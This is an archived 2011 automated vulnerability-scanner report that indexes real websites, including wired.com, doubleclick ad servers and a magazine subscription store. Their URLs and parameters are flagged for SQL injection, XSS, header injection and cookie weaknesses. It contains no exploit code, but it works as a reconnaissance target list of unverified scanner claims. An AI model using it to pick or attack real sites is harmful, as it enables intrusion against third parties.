DORK Search, Exploit Research, Vulnerability Reports

DORK Daily Report for January 13, 2011 | Vulnerability Crawler Information

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Thu Jan 13 10:08:59 CST 2011.



DORK CWE-79 XSS Report

1. SQL injection

1.1. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [name of an arbitrarily supplied request parameter]

1.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 3]

1.3. http://www.sentinelinvestments.com/forms_literature.php [name of an arbitrarily supplied request parameter]

1.4. http://www.sentinelinvestments.com/index.php [name of an arbitrarily supplied request parameter]

1.5. http://www.sentinelinvestments.com/sentinel_news_detail.php [name of an arbitrarily supplied request parameter]

1.6. http://www.websitedescription.com/msn.whitepages.com [REST URL parameter 1]

1.7. http://www.websitedescription.com/msn.whitepages.com [name of an arbitrarily supplied request parameter]

1.8. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter]

1.9. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

2.3. http://ad.doubleclick.net/activity [src parameter]

2.4. http://ad.doubleclick.net/ad/wiredcom.dart/threatlevel [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [REST URL parameter 1]

2.6. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel [REST URL parameter 1]

2.7. http://ad.uk.doubleclick.net/ad/reg.misc.4159/textlink [REST URL parameter 1]

2.8. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink [REST URL parameter 1]

2.9. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 1]

2.10. http://ad.uk.doubleclick.net/imp [REST URL parameter 1]

2.11. http://ad.uk.doubleclick.net/jump/reg.misc.4159/textlink [REST URL parameter 1]

2.12. http://ad.uk.doubleclick.net/jump/reg.security.4159/front [REST URL parameter 1]

2.13. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

2.14. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

2.15. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

2.16. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

2.17. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

2.18. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

2.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.20. http://download.cnet.com/8737-1_1-0.xml [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.insightexpressai.com/adserver/adServer.aspx [name of an arbitrarily supplied request parameter]

3.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.4. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

3.5. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

3.6. http://digg.com/submit [REST URL parameter 1]

3.7. http://flowplayer.org/tools/ [REST URL parameter 1]

3.8. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]

3.9. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]

3.10. http://weeklyad.target.com/target/default.aspx [name of an arbitrarily supplied request parameter]

3.11. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.12. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.13. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

3.14. http://www.ccmaine.net/AboutUs [REST URL parameter 1]

3.15. http://www.ccmaine.net/AboutUs [REST URL parameter 1]

3.16. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]

3.17. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]

3.18. http://www.ccmaine.net/ContactUs [REST URL parameter 1]

3.19. http://www.ccmaine.net/ContactUs [REST URL parameter 1]

3.20. http://www.ccmaine.net/HomePage [REST URL parameter 1]

3.21. http://www.ccmaine.net/HomePage [REST URL parameter 1]

3.22. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]

3.23. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]

3.24. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]

3.25. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]

3.26. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]

3.27. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]

3.28. http://www.ccmaine.net/a [REST URL parameter 1]

3.29. http://www.ccmaine.net/a [REST URL parameter 1]

3.30. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure [REST URL parameter 5]

3.31. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest [REST URL parameter 5]

3.32. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite [REST URL parameter 5]

3.33. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides [REST URL parameter 5]

3.34. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio [REST URL parameter 5]

3.35. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler [REST URL parameter 5]

3.36. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details [REST URL parameter 5]

3.37. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride [REST URL parameter 5]

3.38. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ [REST URL parameter 5]

3.39. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour [REST URL parameter 5]

3.40. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest [REST URL parameter 5]

3.41. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld [REST URL parameter 5]

3.42. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky [REST URL parameter 5]

3.43. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride [REST URL parameter 5]

3.44. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker [REST URL parameter 5]

3.45. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self [REST URL parameter 5]

3.46. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue [REST URL parameter 5]

3.47. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair [REST URL parameter 5]

3.48. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue [REST URL parameter 5]

3.49. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W [REST URL parameter 5]

3.50. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired [REST URL parameter 5]

3.51. http://www.tukui.org/v2/blog/ [name of an arbitrarily supplied request parameter]

3.52. http://www.tukui.org/v2/category/others/ [name of an arbitrarily supplied request parameter]

3.53. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]

3.54. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]

3.55. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]

3.56. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

3.57. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

3.58. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

3.59. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

3.60. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

3.61. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

3.62. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]

3.63. http://www.wired.com/user/login [REST URL parameter 1]

3.64. http://www.wired.com/user/login [REST URL parameter 2]

3.65. http://www.wired.com/user/logout [REST URL parameter 1]

3.66. http://www.wired.com/user/logout [REST URL parameter 2]

3.67. http://www.wired.com/user/registration [REST URL parameter 1]

3.68. http://www.wired.com/user/registration [REST URL parameter 2]

3.69. http://www.wired.com/video/ [REST URL parameter 1]

3.70. http://www.wired.com/video/search/ [REST URL parameter 1]

3.71. http://www.wired.com/video/search/ [REST URL parameter 2]

3.72. http://www.wired.com/video/search/ [REST URL parameter 2]

3.73. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.74. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.75. http://www.cbsinteractive.com/adfeedback/ [Referer HTTP header]

3.76. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml [Referer HTTP header]

3.77. http://www.zdnet.com/ [Referer HTTP header]

3.78. http://www.zdnet.com/ [Referer HTTP header]

3.79. http://www.zdnet.com/ [Referer HTTP header]

4. Flash cross-domain policy

4.1. http://ad.crwdcntrl.net/crossdomain.xml

4.2. http://ad.doubleclick.net/crossdomain.xml

4.3. http://ad.uk.doubleclick.net/crossdomain.xml

4.4. http://b.scorecardresearch.com/crossdomain.xml

4.5. http://bs.serving-sys.com/crossdomain.xml

4.6. http://ad.wsod.com/crossdomain.xml

4.7. http://adlog.com.com/crossdomain.xml

4.8. http://www.walmart.com/crossdomain.xml

4.9. http://www.washingtonpost.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://account.theregister.co.uk/register/

6.2. http://digg.com/submit

6.3. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

6.4. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

6.5. http://lists.arin.net/mailman/listinfo/arin-whoisrws

6.6. http://whitepapers.theregister.co.uk/

6.7. http://whitepapers.theregister.co.uk/search/

6.8. http://www.43things.com/person/

6.9. http://www.sentinelinvestments.com/advisor-login

6.10. http://www.tukaiz.com/index.php

7. XML injection

8. SSL cookie without secure flag set

8.1. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure

8.2. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

8.3. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

8.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides

8.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

8.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

8.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details

8.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

8.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ

8.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour

8.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

8.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

8.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky

8.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride

8.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker

8.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self

8.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

8.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair

8.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue

8.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W

8.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired

9. Password field submitted using GET method

10. Cookie scoped to parent domain

10.1. http://www.43things.com/person/

10.2. http://www.admob.com/

10.3. http://www.walmart.com/x22

10.4. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

10.5. http://ad.doubleclick.net/activity

10.6. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

10.7. http://ad.doubleclick.net/clk

10.8. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel

10.9. http://ad.insightexpressai.com/adserver/adServer.aspx

10.10. http://b.scorecardresearch.com/b

10.11. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

10.12. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.13. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

10.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.15. http://download.cnet.com/1770-20_4-0.html

10.16. http://download.cnet.com/8300-2007_4-12.xml

10.17. http://download.cnet.com/8301-2007_4-20015771-12.html

10.18. http://download.cnet.com/8301-2007_4-20027809-12.html

10.19. http://download.cnet.com/8301-2007_4-20027809-12.html--

10.20. http://download.cnet.com/8301-2007_4-20027865-12.html

10.21. http://download.cnet.com/download-blog/

10.22. http://download.cnet.com/mac/

10.23. http://download.cnet.com/mobile-downloads/

10.24. http://download.cnet.com/webware-apps/

10.25. http://download.cnet.com/windows/

10.26. http://landesm.gfi.com/event-log-analysis-sm/

10.27. http://www.zdnet.com/

11. Cookie without HttpOnly flag set

11.1. http://weeklyad.target.com/target/default.aspx

11.2. http://www.43things.com/person/

11.3. http://www.admob.com/

11.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure

11.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

11.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

11.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides

11.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

11.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

11.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details

11.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

11.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ

11.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour

11.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

11.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

11.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky

11.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride

11.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker

11.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self

11.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

11.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair

11.22. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue

11.23. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W

11.24. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired

11.25. http://www.sentinelinvestments.com/

11.26. http://www.tukui.org/v2/forums/register.php

11.27. http://www.walmart.com/x22

11.28. http://www.wired.com/services/corrections/

11.29. http://www.wired.com/services/newsletters

11.30. http://www.wired.com/user/login

11.31. http://www.wired.com/user/logout

11.32. http://www.wired.com/user/registration

11.33. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

11.34. http://ad.doubleclick.net/activity

11.35. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

11.36. http://ad.doubleclick.net/clk

11.37. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel

11.38. http://ad.insightexpressai.com/adserver/adServer.aspx

11.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317

11.40. http://b.scorecardresearch.com/b

11.41. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

11.42. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

11.43. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

11.44. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

11.45. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

11.46. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

11.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.48. http://digg.com/submit

11.49. http://download.cnet.com/1770-20_4-0.html

11.50. http://download.cnet.com/8300-2007_4-12.xml

11.51. http://download.cnet.com/8301-2007_4-20015771-12.html

11.52. http://download.cnet.com/8301-2007_4-20027809-12.html

11.53. http://download.cnet.com/8301-2007_4-20027809-12.html--

11.54. http://download.cnet.com/8301-2007_4-20027865-12.html

11.55. http://download.cnet.com/download-blog/

11.56. http://download.cnet.com/mac/

11.57. http://download.cnet.com/mobile-downloads/

11.58. http://download.cnet.com/webware-apps/

11.59. http://download.cnet.com/windows/

11.60. http://landesm.gfi.com/event-log-analysis-sm/

11.61. http://www.addthis.com/bookmark.php

11.62. http://www.ccmaine.net/

11.63. http://www.zdnet.com/

12. Password field with autocomplete enabled

12.1. http://account.theregister.co.uk/register/

12.2. http://darkblue.com/index.htm

12.3. http://darkblue.com/index.htm

12.4. http://digg.com/submit

12.5. https://edit.yahoo.com/registration

12.6. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

12.7. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

12.8. http://lists.arin.net/mailman/listinfo/arin-whoisrws

12.9. http://whitepapers.theregister.co.uk/

12.10. http://whitepapers.theregister.co.uk/search/

12.11. http://www.43things.com/person/

12.12. http://www.admob.com/

12.13. http://www.connect.facebook.com/widgets/fan.php

12.14. http://www.sentinelinvestments.com/advisor-login

12.15. http://www.tukaiz.com/index.php

13. Source code disclosure

13.1. http://www.addthis.com/bookmark.php

13.2. http://www.websitedescription.com/msn.whitepages.com

13.3. http://www.wired.com/magazine/

13.4. http://www.wired.com/magazine/ipad

13.5. http://www.wired.com/playbook/

14. Referer-dependent response

15. Cross-domain Referer leakage

15.1. http://account.theregister.co.uk/register/

15.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front

15.3. https://edit.yahoo.com/registration

15.4. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml

15.5. http://www.wired.com/js/global.js

16. Cross-domain script include

16.1. http://dean.edwards.name/weblog/2006/03/base/

16.2. http://digg.com/submit

16.3. http://download.cnet.com/1770-20_4-0.html

16.4. http://download.cnet.com/3474-4_4-0.html

16.5. http://download.cnet.com/8301-2007_4-20015771-12.html

16.6. http://download.cnet.com/8301-2007_4-20027809-12.html

16.7. http://download.cnet.com/8301-2007_4-20027809-12.html--

16.8. http://download.cnet.com/8301-2007_4-20027809-12.html/

16.9. http://download.cnet.com/8301-2007_4-20027865-12.html

16.10. http://download.cnet.com/8618-2007_4-20027809.html

16.11. http://download.cnet.com/download-blog/

16.12. http://download.cnet.com/mac/

16.13. http://download.cnet.com/mobile-downloads/

16.14. http://download.cnet.com/webware-apps/

16.15. http://download.cnet.com/windows/

16.16. http://flowplayer.org/tools/

16.17. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

16.18. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

16.19. http://landesm.gfi.com/event-log-analysis-sm/

16.20. http://www.addthis.com/bookmark.php

16.21. http://www.admob.com/

16.22. http://www.cbsinteractive.com/adfeedback/

16.23. http://www.connect.facebook.com/widgets/fan.php

16.24. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml

16.25. http://www.pwc.com/en_GX/webadmin/forms/email_a_colleague.jhtml

16.26. http://www.pwc.com/gx/en/annual-review

16.27. http://www.pwc.com/gx/en/annual-review/facts-figures-2010.jhtml

16.28. http://www.pwc.com/gx/en/index.jhtml

16.29. http://www.pwc.com/us/en/10minutes/cloud-computing.jhtml

16.30. http://www.pwc.com/us/en/index.jhtml

16.31. http://www.pwc.com/us/en/industry/index.jhtml

16.32. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml

16.33. http://www.pwc.com/us/en/issues/current-issues.jhtml

16.34. http://www.pwc.com/us/en/services/index.jhtml

16.35. http://www.pwc.com/us/en/technology/index.jhtml

16.36. http://www.tukaiz.com/index.php

16.37. http://www.tukui.org/v2/forums/

16.38. http://www.tukui.org/v2/forums/register.php

16.39. http://www.walmart.com/x22

16.40. http://www.websitedescription.com/msn.whitepages.com

16.41. http://www.wired.com/

16.42. http://www.wired.com/about/blogs

16.43. http://www.wired.com/about/faq/

16.44. http://www.wired.com/about/feedback/

16.45. http://www.wired.com/about/mobile/

16.46. http://www.wired.com/about/press/

16.47. http://www.wired.com/about/privacy-policy/

16.48. http://www.wired.com/about/rss_feeds/

16.49. http://www.wired.com/about/sitemap/

16.50. http://www.wired.com/about/staff_web/

16.51. http://www.wired.com/about/user-agreement/

16.52. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A

16.53. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices

16.54. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header

16.55. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout

16.56. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar

16.57. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover

16.58. http://www.wired.com/autopia/

16.59. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

16.60. http://www.wired.com/blogs/

16.61. http://www.wired.com/cars/

16.62. http://www.wired.com/culture/

16.63. http://www.wired.com/dangerroom/

16.64. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

16.65. http://www.wired.com/entertainment/

16.66. http://www.wired.com/epicenter/

16.67. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

16.68. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/

16.69. http://www.wired.com/gadgetlab/

16.70. http://www.wired.com/gadgets/

16.71. http://www.wired.com/gamelife/

16.72. http://www.wired.com/gaming/

16.73. http://www.wired.com/geekdad/

16.74. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

16.75. http://www.wired.com/inspiredbyyou/

16.76. http://www.wired.com/js/global.js

16.77. http://www.wired.com/magazine/

16.78. http://www.wired.com/magazine/decode/

16.79. http://www.wired.com/magazine/ipad

16.80. http://www.wired.com/medtech/

16.81. http://www.wired.com/nolayout/rssproxy

16.82. http://www.wired.com/playbook/

16.83. http://www.wired.com/politics/

16.84. http://www.wired.com/rawfile/

16.85. http://www.wired.com/reviews/

16.86. http://www.wired.com/reviews/%20

16.87. http://www.wired.com/reviews/category/automotive/

16.88. http://www.wired.com/reviews/category/desktops-and-accessories/

16.89. http://www.wired.com/reviews/category/digital-cameras-and-camcorders/

16.90. http://www.wired.com/reviews/category/gaming-gear/

16.91. http://www.wired.com/reviews/category/home-audio-and-video/

16.92. http://www.wired.com/reviews/category/household/

16.93. http://www.wired.com/reviews/category/media-players/

16.94. http://www.wired.com/reviews/category/mobile-audio/

16.95. http://www.wired.com/reviews/category/mobile-phones/

16.96. http://www.wired.com/reviews/category/notebooks-and-accessories/

16.97. http://www.wired.com/reviews/category/roundups/

16.98. http://www.wired.com/reviews/category/software-and-apps/

16.99. http://www.wired.com/reviews/category/sports-and-outdoors/

16.100. http://www.wired.com/reviews/category/tablets-and-ebook-readers/

16.101. http://www.wired.com/reviews/category/televisions/

16.102. http://www.wired.com/science/

16.103. http://www.wired.com/search

16.104. http://www.wired.com/services/corrections/

16.105. http://www.wired.com/services/newsletters

16.106. http://www.wired.com/software/

16.107. http://www.wired.com/techbiz/

16.108. http://www.wired.com/thisdayintech/

16.109. http://www.wired.com/threatlevel/

16.110. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/

16.111. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/

16.112. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/

16.113. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

16.114. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/

16.115. http://www.wired.com/threatlevel/2011/01/codebreakers-death/

16.116. http://www.wired.com/threatlevel/2011/01/dubai-assassination/

16.117. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/

16.118. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/

16.119. http://www.wired.com/threatlevel/2011/01/video-poker/

16.120. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/

16.121. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

16.122. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

16.123. http://www.wired.com/threatlevel/author/kimzetter/

16.124. http://www.wired.com/threatlevel/category/announcements/

16.125. http://www.wired.com/threatlevel/category/atm-hacking/

16.126. http://www.wired.com/threatlevel/category/bittorrent/

16.127. http://www.wired.com/threatlevel/category/black-hat-conference/

16.128. http://www.wired.com/threatlevel/category/bradley-manning/

16.129. http://www.wired.com/threatlevel/category/breaches/

16.130. http://www.wired.com/threatlevel/category/censorship/

16.131. http://www.wired.com/threatlevel/category/chaos-computer-club/

16.132. http://www.wired.com/threatlevel/category/conferences/

16.133. http://www.wired.com/threatlevel/category/copyrights-and-patents/

16.134. http://www.wired.com/threatlevel/category/coverups/

16.135. http://www.wired.com/threatlevel/category/crime/

16.136. http://www.wired.com/threatlevel/category/crypto/

16.137. http://www.wired.com/threatlevel/category/cybarmageddon/

16.138. http://www.wired.com/threatlevel/category/cyber-warfare/

16.139. http://www.wired.com/threatlevel/category/cyberbullying/

16.140. http://www.wired.com/threatlevel/category/cybersecurity/

16.141. http://www.wired.com/threatlevel/category/defcon/

16.142. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/

16.143. http://www.wired.com/threatlevel/category/e-voting/

16.144. http://www.wired.com/threatlevel/category/elections/

16.145. http://www.wired.com/threatlevel/category/fed-blotter/

16.146. http://www.wired.com/threatlevel/category/glitches-and-bugs/

16.147. http://www.wired.com/threatlevel/category/hacks-and-cracks/

16.148. http://www.wired.com/threatlevel/category/hans-reiser-trial/

16.149. http://www.wired.com/threatlevel/category/identification/

16.150. http://www.wired.com/threatlevel/category/intellectual-property/

16.151. http://www.wired.com/threatlevel/category/lori-drew-trial/

16.152. http://www.wired.com/threatlevel/category/network-neutrality/

16.153. http://www.wired.com/threatlevel/category/nsa/

16.154. http://www.wired.com/threatlevel/category/openleaks/

16.155. http://www.wired.com/threatlevel/category/politics/

16.156. http://www.wired.com/threatlevel/category/porn/

16.157. http://www.wired.com/threatlevel/category/privacy/

16.158. http://www.wired.com/threatlevel/category/rfid/

16.159. http://www.wired.com/threatlevel/category/riaa-litigation/

16.160. http://www.wired.com/threatlevel/category/rsa-conference/

16.161. http://www.wired.com/threatlevel/category/sexting/

16.162. http://www.wired.com/threatlevel/category/spooks-gone-wild/

16.163. http://www.wired.com/threatlevel/category/stuxnet/

16.164. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/

16.165. http://www.wired.com/threatlevel/category/surveillance/

16.166. http://www.wired.com/threatlevel/category/the-courts/

